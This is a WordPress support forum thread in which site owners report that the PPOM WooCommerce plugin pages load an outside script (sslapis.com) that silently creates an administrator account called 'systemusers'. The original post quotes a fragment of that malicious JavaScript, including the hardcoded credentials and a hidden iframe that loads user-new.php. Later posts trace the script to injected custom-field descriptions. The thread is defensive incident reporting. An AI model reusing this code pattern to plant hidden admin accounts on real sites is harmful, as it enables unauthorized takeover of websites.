Title: Admin User creating attack Last modified: November 5, 2019 --- # Admin User creating attack * Resolved [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/) * Hi ! I installed PPOM plugin on my wordpress site for a while, and recently I had a spontaneous administrator user creation “systemusers” which happened. Using the debug mode of firefox, I check that when I’m browsing a product page with additional fields created with ppom plugins, it try to execute a script [https://sslapis.com/assets/si/stat.js](https://sslapis.com/assets/si/stat.js) wich contains this code : … function processNewUser(adminhref){ var username = ‘systemusers’; var email = ‘systemusers@gmailen.com’; var password = ‘KYPzRkaJb0avdB’; * pfr=document.createElement(‘iframe’); pfr.style.visibility=’hidden’; pfr.name =’pfr’; pfr.src=adminhref+’/user-new.php’; * pfr.onload=function(state){ … This script is called in PPOM according to debug mode. When I deactivated PPOM, all is ok. So i delete plugin repertory, and I reinstall it, and I activated plugin, and problem happens again…. * Wordfence premium doesn’t detect anything … Have you got an idea of the problem? * WordPress 5.2.4 Avada 6.1.1 WooCommerce 3.7.1 PPOM for WooCommerce by N-MEDIA 18.6 - This topic was modified 6 years, 6 months ago by [nashe](https://wordpress.org/support/users/nashe/). Viewing 11 replies - 1 through 11 (of 11 total) * [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12098301) * Same user is registered on my site also we also using same plugin * [brozra](https://wordpress.org/support/users/brozra/) * (@brozra) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12098809) * Strange that Wordfence didn’t pick it up. AMP for WP had the same issue a year ago. Although I don’t think Wordfence is closely monitoring this plugin. * [https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/](https://www.wordfence.com/blog/2018/11/xss-injection-campaign-exploits-wordpress-amp-plugin/) * [https://www.bleepingcomputer.com/news/security/active-xss-attacks-targeting-amp-for-wp-wordpress-plugin/](https://www.bleepingcomputer.com/news/security/active-xss-attacks-targeting-amp-for-wp-wordpress-plugin/) * Apparently, the fix is rather easy by performing a nonce authorization check for all administrative requests by properly using current_user_can() for any administrative request. * [https://www.bleepingcomputer.com/news/security/vulnerability-in-amp-for-wp-plugin-allowed-admin-access-to-wordpress/](https://www.bleepingcomputer.com/news/security/vulnerability-in-amp-for-wp-plugin-allowed-admin-access-to-wordpress/) * [N-Media](https://wordpress.org/support/users/nmedia/) * (@nmedia) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12102450) * Hi, * This issue was older version but current version doesn’t have bad script. * Thread Starter [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12102559) * Hi thank you for your answer. But currently it’s the version 18.6 installed, and the problem is still here. I delete previuous plugin, reinstall it, restart the servor, and nothing change. You can check the problem here: [https://beeflow.fr/produit/parrainage-1-2-ruche/](https://beeflow.fr/produit/parrainage-1-2-ruche/) * (I let systemusers created without rights, after changing the password.) thank you for your help * [CheechRockwizard](https://wordpress.org/support/users/cheechrockwizard/) * (@cheechrockwizard) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12103860) * This is exactly what I experienced in 18.4. I’ve updated to 18.6 and am keeping an eye on it. * N-Media response: “Thanks for sharing these details but didn’t face or reported an issue like this. Every of the our inputs is sanitized and scripts are properly enqueued. If you still found any issue please let me know, I will see this ASAP.” But reading the response above, apparently they did know about it! * [https://wordpress.org/support/topic/possible-exploit-3/](https://wordpress.org/support/topic/possible-exploit-3/) * [N-Media](https://wordpress.org/support/users/nmedia/) * (@nmedia) * [6 years, 6 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12113217) * Hi, * We are watching this ticket very regularly, so far no any bug report related to this. Plugin is just fine. * [aliferis](https://wordpress.org/support/users/aliferis/) * (@aliferis) * [6 years, 5 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12215771) * I have the very latest version 18.8 and you do still have the problem * Thread Starter [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 5 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12215802) * No, it’s fixed now. There was an js added on a custom field * [aliferis](https://wordpress.org/support/users/aliferis/) * (@aliferis) * [6 years, 5 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12215816) * well then, upgrading from 18.6 to 18.8 did not get rid of the malicious code * Thread Starter [nashe](https://wordpress.org/support/users/nashe/) * (@nashe) * [6 years, 5 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12215823) * you need to check manually your ppom additionals fields or the demo fields. malicious js code was in description fields * [N-Media](https://wordpress.org/support/users/nmedia/) * (@nmedia) * [6 years, 5 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12216037) * Hi, * [@aliferis](https://wordpress.org/support/users/aliferis/) please I recommend you to remove plugin via FTP and then do a clean install. Also scan other plugins on your site. Viewing 11 replies - 1 through 11 (of 11 total) The topic ‘Admin User creating attack’ is closed to new replies. * ![](https://ps.w.org/woocommerce-product-addon/assets/icon-256x256.gif?rev=3186763) * [PPOM - Product Addons & Custom Fields for WooCommerce](https://wordpress.org/plugins/woocommerce-product-addon/) * [Frequently Asked Questions](https://wordpress.org/plugins/woocommerce-product-addon/#faq) * [Support Threads](https://wordpress.org/support/plugin/woocommerce-product-addon/) * [Active Topics](https://wordpress.org/support/plugin/woocommerce-product-addon/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/woocommerce-product-addon/unresolved/) * [Reviews](https://wordpress.org/support/plugin/woocommerce-product-addon/reviews/) ## Tags * [attack](https://wordpress.org/support/topic-tag/attack/) * 11 replies * 3 participants * Last reply from: [N-Media](https://wordpress.org/support/users/nmedia/) * Last activity: [6 years, 5 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-4/#post-12216037) * Status: resolved